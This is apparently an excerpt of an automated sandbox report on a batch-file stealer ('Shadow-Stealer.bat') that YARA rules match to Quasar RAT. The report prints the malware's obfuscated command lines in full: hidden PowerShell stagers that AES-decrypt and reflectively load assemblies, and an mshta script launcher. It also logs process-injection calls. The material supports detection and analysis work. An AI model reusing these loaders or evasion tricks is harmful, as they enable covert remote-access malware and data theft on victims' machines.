            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CBF217826_2_000001D15CBF2178
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CBFB0D026_2_000001D15CBFB0D0
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CBFF39826_2_000001D15CBFF398
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CC016F826_2_000001D15CC016F8
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CBFB2DC26_2_000001D15CBFB2DC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009DEDD128_2_009DEDD1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009FF9D128_2_009FF9D1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A1F9D128_2_00A1F9D1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A3EDD128_2_00A3EDD1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00AFEDD128_2_00AFEDD1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B1F9D128_2_00B1F9D1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B3F9D128_2_00B3F9D1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_02DCEDD128_2_02DCEDD1
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F4224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,13_2_00007FF7137F4224
            Source: C:\Windows\$sxr-mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Windows\$sxr-mshta.exeSection loaded: sfc.dllJump to behavior
            Source: 15.2.$sxr-powershell.exe.1facd584ef8.29.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 15.2.$sxr-powershell.exe.1facd584ef8.29.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0000000F.00000002.3570248897.000001FACD23D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeFile created: C:\Windows\$sxr-powershell.exeJump to behavior
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,13_2_00007FF7137F88C0
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF71380BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,13_2_00007FF71380BCF0
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,13_2_00007FF7137F8114
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,13_2_00007FF7137F7FF8
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F89E4 NtQueryInformationToken,NtQueryInformationToken,13_2_00007FF7137F89E4
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF713811538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,13_2_00007FF713811538
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,13_2_00007FF7137E3D94
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F898C NtQueryInformationToken,13_2_00007FF7137F898C
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165E2AF4 NtEnumerateValueKey,OpenMutexW,CloseHandle,FindCloseChangeNotification,NtEnumerateValueKey,22_2_000002D0165E2AF4
            Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_004015C1 OpenProcess,NtQueryInformationProcess,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,23_2_004015C1
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F1512744 NtQueryDirectoryFileEx,GetFileType,StrCpyW,24_2_000002D6F1512744
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F151221C NtQuerySystemInformation,StrCmpNIW,24_2_000002D6F151221C
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B492AF4 NtEnumerateValueKey,OpenMutexW,CloseHandle,26_2_000001D15B492AF4
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,13_2_00007FF7137E5240
            Source: Shadow-Stealer.bat.exe, 00000003.00000000.2146671454.00007FF6C0029000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Shadow-Stealer.bat
            Source: Shadow-Stealer.bat.exe.0.drBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Shadow-Stealer.bat
            Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Shadow-Stealer.bat.exeJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@52/13@1/1
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,13_2_00007FF7137E32B0
            Source: C:\Windows\System32\dllhost.exeCode function: 20_2_0000000140001B30 LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification,FindResourceA,RegCreateKeyExW,RegSetKeySecurity,RegCreateKeyExW,RegSetValueExW,RegCloseKey,CreateThread,CreateThread,SleepEx,20_2_0000000140001B30
            Source: C:\Windows\$sxr-powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFh
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Shadow-Stealer.bat" "
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeFile read: C:\Users\user\Desktop\Shadow-Stealer.batJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Shadow-Stealer.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\Shadow-Stealer.bat.exe "Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2ca74e05-00fd-4f33-afb0-1baa728859ba}
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{a795ed5e-f9f8-4b9c-9e39-bf732c676d16}
            Source: unknownProcess created: C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3885b722-1a15-44b5-b09d-ff91e5413f87}
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{99a849d9-b898-48bd-a9ae-8d2739f763c9}
            Source: C:\Windows\$sxr-mshta.exeProcess created: C:\Windows\$sxr-cmd.exe "C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%
            Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8c0db931-f9fd-42d4-a5c0-43590a2016f6}
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{c14234ed-73ac-4d78-a200-79518435a2b0}
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYB
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{cbe0811f-76a5-44cc-bdc5-f8341ab968a9}
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{e8c47de4-1fa8-45ae-ba48-1e652857c9f1}
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{38d5fde3-99ae-4373-8c2f-8b4f5f08f7f3}
            Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{92e841ec-e3f1-4b8b-895f-b885255cbce1}
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{25768c7a-7ac5-4718-a464-d7bd931650f7}
            Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2e416721-4f03-488b-85bf-d48d4305e55d}
            Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{6cf183fd-4345-4e83-86c3-b67edbc5a93f}
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{b21552e6-10c0-4b77-8348-e34fa993b74e}
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{408c66d6-6f69-434f-838a-86e87b4371ae}
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{205dcea9-d057-463c-a3cf-998f0b1939dc}
            Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a65f9779-a778-403b-96e3-bdb0de023251}
